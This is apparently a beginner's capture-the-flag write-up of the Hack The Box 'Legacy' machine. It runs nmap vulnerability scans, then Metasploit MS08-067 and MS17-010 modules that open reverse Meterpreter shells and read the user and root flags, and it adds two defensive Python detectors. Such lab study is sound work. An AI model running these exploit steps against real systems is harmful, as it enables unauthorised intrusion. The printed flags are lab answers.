# Self-introduction
I'm a complete beginner at Hack The Box.
I started because it was recommended as a place to try things out after finishing Hacking Lab.
These are notes for myself, but I'd be grateful for any corrections or suggestions for improvement.
# Machine
This time the machine is Legacy.
I picked this machine because I wanted to work through it following @v_avenger's DEF CON 28 Red Team Village talk, "Building a guerrilla red team that routs adversaries".
# nmap
First, use nmap to look for open ports.
```text
root@kali:~# nmap -A -Pn 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:55 JST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h31m37s, deviation: 2h07m16s, median: 4d23h01m37s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:14:10 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-09-06T23:57:46+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 250.81 ms 10.10.14.1
2 251.14 ms 10.10.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.10 seconds
```
The familiar port numbers 139 and 445 showed up.
They're Samba ports, so I guessed this would probably be done with Metasploit.
I checked for vulnerabilities.
```text
root@kali:~# nmap -Pn -script smb-vuln* -p 139 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 04:10 JST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds
```
`VULNERABLE` was displayed, which shows the host has the ms08-067 and ms17-010 vulnerabilities.
I was curious whether changing the port number would change anything, but there was no particular difference between 139 and 445.
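To make the script output above easier to triage, here is an added Python example (my own code, not part of the original write-up) that parses nmap's `smb-vuln*` tree output into a per-script state and CVE. The sample text is a trimmed copy of the output above, embedded as a constructed string; the parser handles the `false` and `ERROR` forms as well as full `VULNERABLE` reports, so it works on a full scan of many hosts, not just this one.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: a trimmed excerpt of the "smb-vuln*" script output
# from the scan above (not re-captured; indentation as nmap prints it).
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
"""

# A line that opens a script result: "| smb-vuln-xxx:" or "|_smb-vuln-xxx: false"
SCRIPT_LINE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_smb_vuln(output: str) -> Dict[str, Dict[str, Optional[str]]]:
    """Collapse nmap's NSE tree into {script: {state, cve, disclosure}}.

    States: "VULNERABLE", "NOT VULNERABLE" (script printed "false"),
    "ERROR" (script failed) or "UNKNOWN" (no State: line found).
    """
    results: Dict[str, Dict[str, Optional[str]]] = {}
    current: Optional[str] = None
    for raw in output.splitlines():
        line = raw.rstrip()
        m = SCRIPT_LINE.match(line)
        if m:
            current, rest = m.group(1), m.group(2).strip()
            entry: Dict[str, Optional[str]] = {
                "state": "UNKNOWN", "cve": None, "disclosure": None}
            if rest.lower() == "false":
                entry["state"] = "NOT VULNERABLE"
            elif rest.startswith("ERROR"):
                entry["state"] = "ERROR"
            results[current] = entry
            continue
        if current is None or not line.startswith("|"):
            continue
        # Strip the tree prefix ("|", "|_") and indentation.
        body = line.lstrip("|_ ").strip()
        if body.startswith("State:"):
            results[current]["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):
            cve = CVE_RE.search(body)
            results[current]["cve"] = cve.group(0) if cve else None
        elif body.startswith("Disclosure date:"):
            results[current]["disclosure"] = body.split(":", 1)[1].strip()
    return results


def vulnerable_findings(output: str) -> List[str]:
    """Return 'script (CVE)' strings for every check that reported VULNERABLE."""
    parsed = parse_smb_vuln(output)
    return [
        f"{name} ({info['cve'] or 'no CVE'})"
        for name, info in parsed.items()
        if info["state"] == "VULNERABLE"
    ]


if __name__ == "__main__":
    for finding in vulnerable_findings(SAMPLE_NMAP_OUTPUT):
        print(finding)
```

Feed it the saved normal output of `nmap -oN` and the `ERROR` state stays visible, which matters: the ms10-061 check above did not fail because the host is safe, it failed because the script did not run.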
# ms08-067
```text
root@kali:~# searchsploit ms08-067
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067) | windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067) | windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067) | windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit) | windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067) | windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067) | windows/remote/7132.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
searchsploit showed that Metasploit can be used.
```text
msf5 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 > use 0
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.9:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 2 opened (10.10.14.9:4444 -> 10.10.10.4:1033) at 2020-09-02 04:42:00 +0900
```
The shell came back fine.
# ms17-010
I think I've already done this on a different machine, but while I'm at it I'll try it here too.
```text
root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
Metasploit seems usable for this vulnerability too, so I'll go with it.
```text
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
msf5 > use 4
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81e5c1d0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... EoQoquDI.exe
[*] 10.10.10.4:445 - Created \EoQoquDI.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \EoQoquDI.exe...
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 2020-08-03 20:44:35 +0900
```
This one also returned a shell fine.
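From the defender's side, the run above leaves a distinctive trace on the host: a randomly named executable is written through ADMIN$ (that is, into %SystemRoot%), registered and started as a service, then deleted. The following added Python example (mine, not the author's and not Metasploit's code) scores Service Control Manager "a service was installed in the system" events (Event ID 7045) for that pattern. The event records are constructed, the field names are my simplified rendering of the 7045 record, and the random-name test is a heuristic of my own.

```python
import ntpath
import re
from typing import Dict, List

# Constructed sample Event ID 7045 records (not captured from the machine).
# The first mimics the trace left above: a randomly named .exe dropped
# into %SystemRoot% via ADMIN$ and started as a service. The other two
# are what ordinary, legitimately installed services look like.
SAMPLE_7045_EVENTS: List[Dict[str, str]] = [
    {"ServiceName": "EoQoquDI", "ImagePath": "C:\\WINDOWS\\EoQoquDI.exe",
     "StartType": "demand start", "Account": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": "C:\\WINDOWS\\system32\\spoolsv.exe",
     "StartType": "auto start", "Account": "LocalSystem"},
    {"ServiceName": "VMTools",
     "ImagePath": "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"",
     "StartType": "auto start", "Account": "LocalSystem"},
]

# Purely alphabetic names of the length a generated name tends to have.
RANDOM_NAME = re.compile(r"^[A-Za-z]{6,12}$")


def case_flips(s: str) -> int:
    """Number of upper<->lower transitions between adjacent letters."""
    letters = [c for c in s if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:])
               if a.isupper() != b.isupper())


def looks_random(name: str) -> bool:
    # Heuristic (mine): randomly generated alphabetic strings flip case
    # several times; real product and service names rarely do.
    return bool(RANDOM_NAME.fullmatch(name)) and case_flips(name) >= 3


def clean_path(image_path: str) -> str:
    """Strip quoting and any arguments that follow the executable."""
    p = image_path.strip()
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    return p.split(" ", 1)[0]


def score_service_install(ev: Dict[str, str]) -> int:
    path = clean_path(ev["ImagePath"])
    directory = ntpath.dirname(path).lower()
    stem = ntpath.splitext(ntpath.basename(path))[0]
    score = 0
    # Binary sitting directly in the drive root or in %SystemRoot%
    # (where a write through ADMIN$ lands), not in an install folder.
    if re.fullmatch(r"[a-z]:\\(windows\\?)?", directory):
        score += 2
    # Generated-looking file stem or service name.
    if looks_random(stem) or looks_random(ev["ServiceName"]):
        score += 2
    # Created on demand as SYSTEM and started immediately afterwards.
    if ev["StartType"] == "demand start" and ev["Account"] == "LocalSystem":
        score += 1
    return score


def suspicious_installs(events: List[Dict[str, str]],
                        threshold: int = 3) -> List[str]:
    """Service names whose install event scores at or above the threshold."""
    return [ev["ServiceName"] for ev in events
            if score_service_install(ev) >= threshold]


if __name__ == "__main__":
    for ev in SAMPLE_7045_EVENTS:
        print(f"{ev['ServiceName']:10} score={score_service_install(ev)}")
    print("flagged:", suspicious_installs(SAMPLE_7045_EVENTS))
```

The scoring deliberately combines three weak signals rather than relying on the name alone: an attacker who sets `SERVICE_NAME` to something plausible (the option is visible in the module output above) still has to drop the binary somewhere writable through the share and start it as SYSTEM. On a real host the 7045 event is followed almost immediately by the file's deletion, which is why this check belongs on forwarded logs rather than on the box itself.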
# user
```text
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd /
meterpreter > dir
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2017-03-16 14:30:44 +0900 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 14:30:44 +0900 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 14:30:44 +0900 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 14:30:44 +0900 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 05:13:04 +0900 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2017-03-16 14:20:57 +0900 Program Files
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:30 +0900 System Volume Information
40777/rwxrwxrwx 0 dir 2017-03-16 14:18:34 +0900 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 14:20:02 +0900 boot.ini
100444/r--r--r-- 250048 fil 2008-04-14 07:01:44 +0900 ntldr
60401544/r-xr--r-- 48691528838709231 fif 1551977431-11-16 12:18:24 +0900 pagefile.sys
meterpreter > cd Documents\ and\ Settings
meterpreter > dir
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 14:32:52 +0900 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 14:32:42 +0900 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 john
meterpreter > cd john
meterpreter > dir
Listing: C:\Documents and Settings\john
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-16 14:33:41 +0900 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 14:33:41 +0900 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 14:33:42 +0900 ntuser.ini
meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 15:19:32 +0900 user.txt
meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f
```
# root
```text
meterpreter > dir
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 14:32:52 +0900 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 14:32:42 +0900 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 john
meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Documents and Settings\Administrator
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 My Documents
100666/rw-rw-rw- 786432 fil 2017-03-16 15:07:20 +0900 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 15:07:20 +0900 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 15:07:21 +0900 ntuser.ini
meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 15:18:19 +0900 root.txt
meterpreter > cat root.txt
993442d258b0e0ec917cae9e695d5713
```
# Questions
- At the ms17-010 step, after running `search` in Metasploit I was confused about which module to use.
How do you tell them apart?
When I looked it up on Exploit DB, only the one corresponding to Metasploit module number 4 was listed.
- Module types
# Impressions
This was my third machine.
It's not for me to say, but I felt one bit of growth was that I've started to get a sense of things just from looking at the port numbers.
I could only get through this one because I had done Lame and Blue; I expect a different kind of machine would give me a hard time.
I'll keep at it.
As points to reflect on, I felt it was not good that I didn't check my privileges after getting a shell, and that I didn't look at Exploit DB.
Thank you for reading this clumsy article to the end.